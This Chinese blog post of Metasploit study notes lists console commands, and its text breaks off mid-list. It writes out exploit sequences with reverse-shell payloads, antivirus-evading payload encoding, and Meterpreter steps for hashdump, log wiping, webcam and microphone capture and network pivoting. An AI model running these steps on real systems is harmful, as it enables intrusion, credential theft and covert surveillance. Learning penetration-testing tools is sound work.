<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="msf, YeOrLuOp">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>msf | YeOrLuOp</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 4.2.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">YeOrLuOp</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">YeOrLuOp</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/8.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">msf</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%B7%A5%E5%85%B7/">
                                <span class="chip bg-color">工具</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" class="post-category">
                                网络安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-10-29
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2020-11-08
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    7k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    32 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <center>msf学习笔记</center>

<h1 id="先看师傅咋学的"><a href="#先看师傅咋学的" class="headerlink" title="先看师傅咋学的"></a>先看师傅咋学的</h1><p><a href="https://www.ascotbe.com/2020/05/06/MeterpreterCommand/#%E5%89%8D%E8%A8%80" target="_blank" rel="noopener">https://www.ascotbe.com/2020/05/06/MeterpreterCommand/#%E5%89%8D%E8%A8%80</a></p>
<p><a href="https://www.ascotbe.com/2020/05/06/MeterpreterCommand/#%E6%96%87%E4%BB%B6%E7%9B%AE%E5%BD%95%E8%A7%A3%E6%9E%90" target="_blank" rel="noopener">https://www.ascotbe.com/2020/05/06/MeterpreterCommand/#%E6%96%87%E4%BB%B6%E7%9B%AE%E5%BD%95%E8%A7%A3%E6%9E%90</a></p>
<p><a href="https://img2020.cnblogs.com/blog/2092671/202010/2092671-20201031164610526-1646989081.png" target="_blank" rel="noopener">https://img2020.cnblogs.com/blog/2092671/202010/2092671-20201031164610526-1646989081.png</a>)</p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://www.rapid7.com/" target="_blank" rel="noopener">https://www.rapid7.com/</a></p>
<p><a href="https://github.com/rapid7/metasploit-framework" target="_blank" rel="noopener">https://github.com/rapid7/metasploit-framework</a></p>
<p><a href="https://www.anquanke.com/post/id/209966" target="_blank" rel="noopener">https://www.anquanke.com/post/id/209966</a></p>
<p><a href="https://www.anquanke.com/post/id/209974" target="_blank" rel="noopener">https://www.anquanke.com/post/id/209974</a></p>
<p><a href="https://tophub.today/search?q=msf" target="_blank" rel="noopener">https://tophub.today/search?q=msf</a></p>
<p><a href="https://parrotsec-cn.org/t/metasploit/95" target="_blank" rel="noopener">https://parrotsec-cn.org/t/metasploit/95</a></p>
<p><img src="https://p3.ssl.qhimg.com/t01a66f41cdd2d32845.jpg" alt="img"></p>
<p>知道漏洞名称之后可以在搜索对应的模块或者pc添加利用</p>
<pre><code>https://www.exploit-db.com
https://www.rapid7.com</code></pre><h1 id="msf框架体系结构"><a href="#msf框架体系结构" class="headerlink" title="msf框架体系结构"></a>msf框架体系结构</h1><p><img src="C:%5CUsers%5CRESCUER%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20201108135046311.png" alt="image-20201108135046311"></p>
<p><img src="https://parrotsec-cn.org/uploads/default/original/1X/0ed3dfc02274ea463133d1e76f8c626af5966a6b.png" alt="img"></p>
<p><img src="C:%5CUsers%5CRESCUER%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20201107222344746.png" alt="image-20201107222344746"></p>
<h2 id="Rex"><a href="#Rex" class="headerlink" title="Rex:"></a>Rex:</h2><ol>
<li>基本功能库</li>
<li>处理socket连接访问、协议应答（http/ssl/SMB等）</li>
</ol>
<h2 id="Msf-Core"><a href="#Msf-Core" class="headerlink" title="Msf::Core"></a>Msf::Core</h2><ol>
<li>提供核心基本API，是框架的核心能力实现库</li>
</ol>
<h2 id="Msf-Base"><a href="#Msf-Base" class="headerlink" title="Msf::Base"></a>Msf::Base</h2><ol>
<li>提供API接口，便于调用模块的库</li>
</ol>
<h2 id="Plugin插件"><a href="#Plugin插件" class="headerlink" title="Plugin插件"></a>Plugin插件</h2><h1 id="help命令"><a href="#help命令" class="headerlink" title="help命令"></a>help命令</h1><h2 id="Core-Commands"><a href="#Core-Commands" class="headerlink" title="Core Commands"></a>Core Commands</h2><pre><code>Command       Description
-------       -----------
?             Help menu
banner        Display an awesome metasploit banner
cd            Change the current working directory
color         Toggle color
connect       Communicate with a host
debug         Display information useful for debugging
exit          Exit the console
get           Gets the value of a context-specific variable
getg          Gets the value of a global variable
grep          Grep the output of another command
help          Help menu
history       Show command history
load          Load a framework plugin
quit          Exit the console
repeat        Repeat a list of commands
route         Route traffic through a session
save          Saves the active datastores
sessions      Dump session listings and display information about sessions
set           Sets a context-specific variable to a value
setg          Sets a global variable to a value
sleep         Do nothing for the specified number of seconds
spool         Write console output into a file as well the screen
threads       View and manipulate background threads
tips          Show a list of useful productivity tips
unload        Unload a framework plugin
unset         Unsets one or more context-specific variables
unsetg        Unsets one or more global variables
version       Show the framework and console library version numbers</code></pre><h2 id="Module-Commands"><a href="#Module-Commands" class="headerlink" title="Module Commands"></a>Module Commands</h2><pre><code>Command       Description
-------       -----------
advanced      Displays advanced options for one or more modules
back          Move back from the current context
clearm        Clear the module stack
info          Displays information about one or more modules
listm         List the module stack
loadpath      Searches for and loads modules from a path
options       Displays global options or for one or more modules
popm          Pops the latest module off the stack and makes it active
previous      Sets the previously loaded module as the current module
pushm         Pushes the active or list of modules onto the module stack
reload_all    Reloads all modules from all defined module paths
search        Searches module names and descriptions
show          Displays modules of a given type, or all modules
use           Interact with a module by name or search term/index</code></pre><h2 id="Job-Commands"><a href="#Job-Commands" class="headerlink" title="Job Commands"></a>Job Commands</h2><pre><code>Command       Description
-------       -----------
handler       Start a payload handler as job
jobs          Displays and manages jobs
kill          Kill a job
rename_job    Rename a job</code></pre><h2 id="Resource-Script-Commands"><a href="#Resource-Script-Commands" class="headerlink" title="Resource Script Commands"></a>Resource Script Commands</h2><pre><code>Command       Description
-------       -----------
makerc        Save commands entered since start to a file
resource      Run the commands stored in a file</code></pre><h2 id="Database-Backend-Commands"><a href="#Database-Backend-Commands" class="headerlink" title="Database Backend Commands"></a>Database Backend Commands</h2><pre><code>Command           Description
-------           -----------
analyze           Analyze database information about a specific address or address range
db_connect        Connect to an existing data service
db_disconnect     Disconnect from the current data service
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
db_remove         Remove the saved data service entry
db_save           Save the current data service connection as the default to reconnect on startup
db_status         Show the current data service status
hosts             List all hosts in the database
loot              List all loot in the database
notes             List all notes in the database
services          List all services in the database
vulns             List all vulnerabilities in the database
workspace         Switch between database workspaces</code></pre><h2 id="Credentials-Backend-Commands"><a href="#Credentials-Backend-Commands" class="headerlink" title="Credentials Backend Commands"></a>Credentials Backend Commands</h2><pre><code>Command       Description
-------       -----------
creds         List all credentials in the database</code></pre><h2 id="Developer-Commands"><a href="#Developer-Commands" class="headerlink" title="Developer Commands"></a>Developer Commands</h2><pre><code>Command       Description
-------       -----------
edit          Edit the current module or a file with the preferred editor
irb           Open an interactive Ruby shell in the current context
log           Display framework.log paged to the end if possible
pry           Open the Pry debugger on the current module or Framework
reload_lib    Reload Ruby library files from specified paths</code></pre><h2 id="msfconsole"><a href="#msfconsole" class="headerlink" title="msfconsole"></a>msfconsole</h2><p><code>msfconsole</code> is the primary interface to Metasploit Framework. There is quite a<br>lot that needs go here, please be patient and keep an eye on this space!</p>
<h2 id="Building-ranges-and-lists"><a href="#Building-ranges-and-lists" class="headerlink" title="Building ranges and lists"></a>Building ranges and lists</h2><p>Many commands and options that take a list of things can use ranges to avoid<br>having to manually list each desired thing. All ranges are inclusive.</p>
<h3 id="Ranges-of-IDs"><a href="#Ranges-of-IDs" class="headerlink" title="Ranges of IDs"></a>Ranges of IDs</h3><p>Commands that take a list of IDs can use ranges to help. Individual IDs must be<br>separated by a <code>,</code> (no space allowed) and ranges can be expressed with either<br><code>-</code> or <code>..</code>.</p>
<h3 id="Ranges-of-IPs"><a href="#Ranges-of-IPs" class="headerlink" title="Ranges of IPs"></a>Ranges of IPs</h3><p>There are several ways to specify ranges of IP addresses that can be mixed<br>together. The first way is a list of IPs separated by just a <code></code> (ASCII space),<br>with an optional <code>,</code>. The next way is two complete IP addresses in the form of<br><code>BEGINNING_ADDRESS-END_ADDRESS</code> like <code>127.0.1.44-127.0.2.33</code>. CIDR<br>specifications may also be used, however the whole address must be given to<br>Metasploit like <code>127.0.0.0/8</code> and not <code>127/8</code>, contrary to the RFC.<br>Additionally, a netmask can be used in conjunction with a domain name to<br>dynamically resolve which block to target. All these methods work for both IPv4<br>and IPv6 addresses. IPv4 addresses can also be specified with special octet<br>ranges from the <a href="https://nmap.org/book/man-target-specification.html" target="_blank" rel="noopener">NMAP target<br>specification</a></p>
<h3 id="Examples"><a href="#Examples" class="headerlink" title="Examples"></a>Examples</h3><p>Terminate the first sessions:</p>
<pre><code>sessions -k 1</code></pre><p>Stop some extra running jobs:</p>
<pre><code>jobs -k 2-6,7,8,11..15</code></pre><p>Check a set of IP addresses:</p>
<pre><code>check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255</code></pre><p>Target a set of IPv6 hosts:</p>
<pre><code>set RHOSTS fe80::3990:0000/110, ::1-::f0f0</code></pre><p>Target a block from a resolved domain name:</p>
<pre><code>set RHOSTS www.example.test/24</code></pre><h1 id="msfvenom"><a href="#msfvenom" class="headerlink" title="msfvenom"></a>msfvenom</h1><ol>
<li>msfvenom -l payloads 查看所有可用payload列表</li>
<li>msfvenom -l encoders 产看可用编辑器</li>
<li>-p:<ol>
<li>指定要使用的payload</li>
<li>使用自定义payload</li>
</ol>
</li>
<li>-f：指定输出格式</li>
</ol>
<h1 id="metasploitrpc-服务"><a href="#metasploitrpc-服务" class="headerlink" title="metasploitrpc 服务"></a>metasploitrpc 服务</h1><h1 id="metasploit免杀"><a href="#metasploit免杀" class="headerlink" title="metasploit免杀"></a>metasploit免杀</h1><h1 id="默认模块路径"><a href="#默认模块路径" class="headerlink" title="默认模块路径"></a>默认模块路径</h1><blockquote>
<p>/usr/share/metasploit-framework/modules</p>
</blockquote>
<h1 id="Aux（辅助模块）"><a href="#Aux（辅助模块）" class="headerlink" title="Aux（辅助模块）"></a>Aux（辅助模块）</h1><blockquote>
<p>执行信息收集、美句、职位探测、扫描等功能的辅助模块（没有payload的expoit模块）</p>
</blockquote>
<h1 id="Nops（空指令模块）"><a href="#Nops（空指令模块）" class="headerlink" title="Nops（空指令模块）"></a>Nops（空指令模块）</h1><blockquote>
<p>提高payload稳定性及维持大小</p>
</blockquote>
<h1 id="Encoders（编码器模块）"><a href="#Encoders（编码器模块）" class="headerlink" title="Encoders（编码器模块）"></a>Encoders（编码器模块）</h1><blockquote>
<p>对payload进行加密，躲避AV检查的模块</p>
</blockquote>
<h1 id="msf控制台命令"><a href="#msf控制台命令" class="headerlink" title="msf控制台命令"></a>msf控制台命令</h1><ol>
<li>postgre数据库（5432）</li>
<li>Banner 显示一个很棒的metasploit横幅</li>
<li>Color 切换颜色</li>
<li>connect -h</li>
<li>show auxiliary / exploits / payloads / encoders / nops</li>
<li>search usermap_script / help search<ol>
<li>search name:mysql / path:scada / platform:aix / type:aux /author:aaron /<br>cve:2011 / 可多条件同时搜索</li>
</ol>
</li>
<li>use dos/windows/smb/ms09_001_write<ol>
<li>show options / payloads / targets / advanced / evasion</li>
<li>info edit</li>
</ol>
</li>
<li>Check 、back</li>
<li>db_status / db_rebuild_cache</li>
<li>db_nmap<ol>
<li>Hosts / host 1.1.1.1 / hosts -u / hosts -c address,os_flavor -S Linux</li>
<li>services -p 80 / services -c info,name -p 1-1000</li>
<li>vulns / creds (mysql_login) / loot (hashdump)</li>
</ol>
</li>
<li>db_disconnect / db_connect<ol>
<li>/usr/share/metasploit-framework/config/database.yml<br>▪ db_import / db_export<br>– db_import /root/nmap.xml<br>– db_export -f xml /root/bak.xml</li>
</ol>
</li>
<li>set / unset / setg / unsetg / save</li>
<li>Run / exploit</li>
<li>jobs / kill 0 </li>
<li>load / unload /loadpath</li>
<li>Sessions<ol>
<li>sessions -l / -i (Shell ̵Meterpreter session̵VNC)</li>
</ol>
</li>
<li>route 通过制定session路由流量</li>
<li>irb  (Framework::Version)</li>
<li>Resource  (msfconsol -r a.rc)</li>
</ol>
<h1 id="scanner模块"><a href="#scanner模块" class="headerlink" title="scanner模块"></a>scanner模块</h1><h1 id="exploit模块（攻击模块）"><a href="#exploit模块（攻击模块）" class="headerlink" title="exploit模块（攻击模块）"></a>exploit模块（攻击模块）</h1><blockquote>
<p>对应每一个具体漏洞的攻击方法（主动、被动）</p>
</blockquote>
<ol>
<li>Active exploit<ol>
<li>use exploit/windows/smb/psexec</li>
<li>set RHOST 192.168.1.100</li>
<li>set PAYLOAD windows/shell/reverse_tcp</li>
<li>set LHOST 192.168.1.1</li>
<li>set LPORT 4444</li>
<li>set SMBUSER user1</li>
<li>set SMBPASS pass1</li>
<li>exploit</li>
</ol>
</li>
<li>Passive Exploits<ol>
<li>use exploit/windows/browser/ms07_017_ani_loadimage_chunksize</li>
<li>set URIPATH /</li>
<li>set PAYLOAD windows/shell/reverse_tcp</li>
<li>set LHOST 192.168.1.1</li>
<li>set LPORT 4444 </li>
<li>exploit</li>
</ol>
</li>
</ol>
<h1 id="生成payload"><a href="#生成payload" class="headerlink" title="生成payload"></a>生成payload</h1><blockquote>
<p>生成payload，有有两个必须的选项：-p -f。使用-p 来指定要使用的payload</p>
</blockquote>
<ol>
<li>use payload/windows/shell_bind_tcp</li>
<li>generate（ 坏字符）<ol>
<li>msf自动选择编码模块绕过坏字符<ol>
<li>generate -b ‘\x00’</li>
<li>generate -b ‘\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b’</li>
<li>generate -b ‘\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b<br>\xFF\x0a\x0b\x01\xcc\6e\x1e\x2e\x26’ </li>
</ol>
</li>
<li>手动指定编码模块<ol>
<li>show encoders / generate -e x86/nonalpha</li>
</ol>
</li>
<li>generate -b ‘\x00’ -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/<br>share/windows-binaries/radmin.exe -f /root/1.exe</li>
<li>NOPғno-operation / Next Operation（无任何操作）<ol>
<li>EIP返回到存储NOP sled的任意地址时将递增，最终导致shellcode执行</li>
<li>generate -s 14</li>
</ol>
</li>
</ol>
</li>
</ol>
<h1 id="msf-pingback-payloads"><a href="#msf-pingback-payloads" class="headerlink" title="msf pingback payloads"></a>msf pingback payloads</h1><p><a href="https://xz.aliyun.com/t/6268" target="_blank" rel="noopener">https://xz.aliyun.com/t/6268</a></p>
<h1 id="meterpreter"><a href="#meterpreter" class="headerlink" title="meterpreter"></a>meterpreter</h1><ol>
<li>高级、动态、可拓展的payload<ol>
<li>基于meterpreter上下文利用更多漏洞发起攻击</li>
<li>后渗透测试阶段一站式操作界面</li>
</ol>
</li>
<li>完全基于内存的DLL注入式payload（不写硬盘）<ol>
<li>注入合法系统进程并建立stager</li>
<li>基于stager上传和预加载DLL进行拓展模块的注入（客户端API）</li>
<li>依据stager建立的socket连接建立加密的TLS/1.0通信隧道</li>
<li>利用TLS隧道进一步加载后续拓展模块（避免网络取证）</li>
</ol>
</li>
</ol>
<h2 id="meterpreter基本命令"><a href="#meterpreter基本命令" class="headerlink" title="meterpreter基本命令"></a>meterpreter基本命令</h2><ol>
<li><p>Help、background(将当前会话放置后台)</p>
</li>
<li><p>Run、bgrun</p>
</li>
<li><p>Cd 、ls 、cat 、pwd 、dir 、mkdir 、mv 、rm 、rmdir 、edit</p>
</li>
<li><p>lpwd（local 查看本地当前的工作目录） 、lcd </p>
</li>
<li><p>clearev（清除windows中的应用程序日志、系统日志、安全日志，需要管理员权限） 、download</p>
<blockquote>
<p>upload /usr/share/windows-binaries/nc.exe c:\windows\system32</p>
</blockquote>
</li>
<li><p>execute -f cmd.exe -i –H</p>
</li>
<li><p>getuid(查看权限 ) 、getsystem 、getprivs 、getproxy 、getpid(获取当前进程的pid)</p>
</li>
<li><p>Hashdump 、run post/windows/gather/hashdump</p>
</li>
<li><p>sysinfo （查看目标机系统信息）、ps(查看当前活跃进程) 、kill(杀死进程) 、migrate（将Meterpreter迁移到我们想注入的进程里面） 、reboot 、shutdown 、shell(进入目标机cmd shell)</p>
</li>
<li><p>show_mount 、search -f autoexec.bat </p>
</li>
<li><p>arp /arp -a（查看高速缓存中的所有项目）、netstat/netstat -na（显示所有连接的端口） 、ipconfig 、ifconfig 、route（路由信息）</p>
<blockquote>
<p>很重要，因为攻击机处于外网，目标主机处于内网，他们之间是不能通信的，故需要添加路由来把攻击机的IP添加到内网里面，这样我们就可以横扫内网，就是所谓的<code>内网代理</code></p>
</blockquote>
</li>
<li><p>Idletime(查看目标机闲置时间) 、resource</p>
</li>
<li><p>record_mic 、webcam_stream（通过摄像头开启视频）、webcam_list(查看摄像头) 、webcam_snap(通过摄像头拍照) -i 1 -v false</p>
</li>
</ol>
<h2 id="msf信息搜集"><a href="#msf信息搜集" class="headerlink" title="msf信息搜集"></a>msf信息搜集</h2><blockquote>
<p>一般情况下我们在渗透测试的时候，如果在不知道资产的情况下，我们会把整个网端进行扫描存活主机，然后再对存活的信息收集信息，这样的话就可以缩短我们的渗透测试时间，而不盲目的去测试</p>
<p>不管是端口扫描还是探测存活主机，都是要设置目标IP地址set rhosts ip地址，如果扫描整个网段的话，最后设置一下线程：set thread 线程数(根据情况设置)。</p>
<p>22、445、3389等敏感端口开放情况探测，在这里需要说明一下，以小白的渗透测试经验，一般先不扫描整个网端，因为这样对目标主机有损耗，可以直接扫描有溢出漏洞的高危端口，如果有的话，那么就可以通过溢出进行提权，这样的方法也是一种捷径。相反的情况下，如果全端口扫描的话个人建议用nmap工具。</p>
<p><a href="https://www.freebuf.com/news/210292.html" target="_blank" rel="noopener">https://www.freebuf.com/news/210292.html</a></p>
</blockquote>
<blockquote>
<p>内置密码表地址：/usr/share/wordlists/metasploit/</p>
</blockquote>
<p>懒得截图了，太慢了，忘了就去看虚拟机保存的操作吧</p>
<ol>
<li><p>Nmap扫描</p>
<p>db_nmap -sV 192.168.1.0/24</p>
<p>nmap -sn -RP 192.168.1.1/24</p>
<blockquote>
<p>-sn 不扫描端口，只扫描主机</p>
<p>-PR  ARP ping扫描</p>
<p>-sP     Ping扫描 sn</p>
<p>-P0     无Ping扫描</p>
<p>-PS     TCP SYN Ping扫描</p>
<p>-PA     TCP ACK Ping扫描</p>
<p>-PU     UDP ping扫描</p>
<p>-PE/PM/PP   ICMP Ping Types扫描</p>
</blockquote>
</li>
<li><p>Auxiliary 模块扫描<br>– RHOSTS &lt;&gt; RHOST </p>
<ol>
<li>192.168.1.20-192.168.1.30̵192.168.1.0/24,192.168.11.0/24</li>
<li>file:/root/h.txt</li>
</ol>
</li>
<li><p>search arp </p>
<blockquote>
<p>ARP： ARP,通过解析<code>网路层地址</code>来找寻<code>数据链路层地址</code>的一个在网络协议包中极其重要的网络传输 协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的 ARP请求广播到网络上的所有主机，并接收返回消息，以此确定目标的物理地址</p>
</blockquote>
<ol>
<li><p>use auxiliary/scanner/discovery/arp_sweep</p>
</li>
<li><p>set INTERFACE 、RHOSTS、SHOST、SMAC、THREADS;run</p>
<p><img src="C:%5CUsers%5CRESCUER%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20201108110525987.png" alt="image-20201108110525987"></p>
</li>
</ol>
</li>
<li><p>search portscan<br>▪ use auxiliary/scanner/portscan/syn<br>▪ set INTERFACE̵ PORTS̵RHOSTS̵THREADS;run</p>
</li>
<li><p>Nmap IPID Idle扫描</p>
<ol>
<li>查找ipidseq主机<ol>
<li>use auxiliary/scanner/ip/ipidseq</li>
<li>set RHOSTS 192.168.1.0/24 ; run</li>
</ol>
</li>
<li>nmap -PN -sI 1.1.1.2 1.1.1.3</li>
</ol>
</li>
<li><p>UDP扫描</p>
<blockquote>
<p>UDP（User Datagram Protocol）是一种<code>无连接</code>的协议，在<code>第四层-传输层</code>，处于IP协议的 上一层。UDP有<code>不提供数据包分组</code>、<code>组装</code>和<code>不能对数据包进行排序</code>的缺点，也就是说，当报 文发送之后，是无法得知其是否安全完整到达的。</p>
<p>UDP显著特性： </p>
<ol>
<li>UDP 缺乏可靠性。UDP 本身不提供确认，超时重传等机制。UDP 数据报可能在网络中被 复制，被重新排序，也不保证每个数据报只到达一次。 </li>
<li>UDP 数据报是有长度的。每个 UDP 数据报都有长度，如果一个数据报正确地到达目的 地，那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议，没有任 何（协议上的）记录边界。 </li>
<li>UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都 选择忽略源站抑制差错，在网络拥塞时，目的端无法接收到大量的UDP数据报 </li>
<li>UDP 支持多播和广播</li>
</ol>
</blockquote>
<ol>
<li>use auxiliary（辅助）/scanner（扫描）/discovery（发现）/udp_sweep(彻底搜索)</li>
<li>use auxiliary/scanner/discovery/udp_probe（探测）</li>
</ol>
</li>
<li><p>密码嗅探</p>
<ol>
<li><p>use auxiliary/sniffer/psnuffle</p>
<blockquote>
<p> 支持从pcap抓包文件中提取密码</p>
<p>功能类似于dsniff</p>
<p>目前只支持pop3、imap、ftp、HTTP GET协议</p>
</blockquote>
</li>
<li><p>SNMP扫描</p>
<blockquote>
<p>SNMP是一种简单网络管理协议，它属于TCP/IP五层协议中的<code>应用层协议</code>，用于网络管理的 协议。SNMP主要用于网络设备的管理。SNMP协议主要由两大部分构成：<code>SNMP管理站</code>和 <code>SNMP代理</code>。SNMP管理站是一个中心节点，负责收集维护各个SNMP元素的信息，并对这 些信息进行处理，最后反馈给网络管理员；</p>
<p>而SNMP代理是运行在各个被管理的网络节点之 上，负责统计该节点的各项信息，并且负责与SNMP管理站交互，接收并执行管理站的命 令，上传各种本地的网络信息。</p>
</blockquote>
<p>– vi /etc/default/snmpd 侦听地址修改为 0.0.0.0<br>– use auxiliary/scanner/snmp/snmp_login<br>– <strong>use auxiliary/scanner/snmp/snmp_enum</strong></p>
<img src="C:\Users\RESCUER\AppData\Roaming\Typora\typora-user-images\image-20201108133419250.png" alt="image-20201108133419250" style="zoom:50%;" />

<p>– use auxiliary/scanner/snmp/snmp_enumusers （windows）<br>– use auxiliary/scanner/snmp/snmp_enumshares （windows）</p>
</li>
<li><p>SMB版本扫描</p>
<blockquote>
<p> SMB(全称是Server Message Block)是一个协议名，它能被用于<code>Web连接</code>和<code>客户端与服务器</code>之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆（Barry Feigenbaum）研制的，其<code>目的</code>是将DOS操作系统中的本地文件接口<code>“中断13”</code>改造为<code>网络文件系统</code>。</p>
</blockquote>
<pre><code>use auxiliary/scanner/smb/smb_version</code></pre></li>
<li><p>扫描命名管道，判断SMB服无类型（账号、密码）</p>
<pre><code>use auxiliary/scanner/smb/pipe_auditor</code></pre></li>
